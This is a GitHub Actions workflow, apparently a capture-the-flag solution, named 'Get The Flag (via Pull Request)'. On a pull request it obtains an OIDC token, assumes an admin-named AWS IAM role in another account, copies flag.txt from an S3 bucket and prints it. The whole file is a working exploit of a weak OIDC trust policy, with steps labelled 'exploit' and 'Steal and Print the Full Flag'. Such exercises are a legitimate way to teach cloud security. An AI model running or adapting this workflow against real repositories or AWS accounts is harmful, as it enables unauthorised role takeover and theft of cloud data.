name: Get The Flag (via Pull Request)
on:
  pull_request:
permissions:
  id-token: write
  contents: read
jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - name: Assume Target AWS Role
      uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875"
        role-session-name: Hacker-Session-${{ github.run_id }}
        aws-region: "ap-southeast-1"
    - name: Steal and Print the Full Flag
      run: |
        aws s3 cp s3://oh-i-really-do-care/flag.txt .
        echo "--- FLAG CONTENT ---"
        cat flag.txt
        echo "--- END FLAG ---"
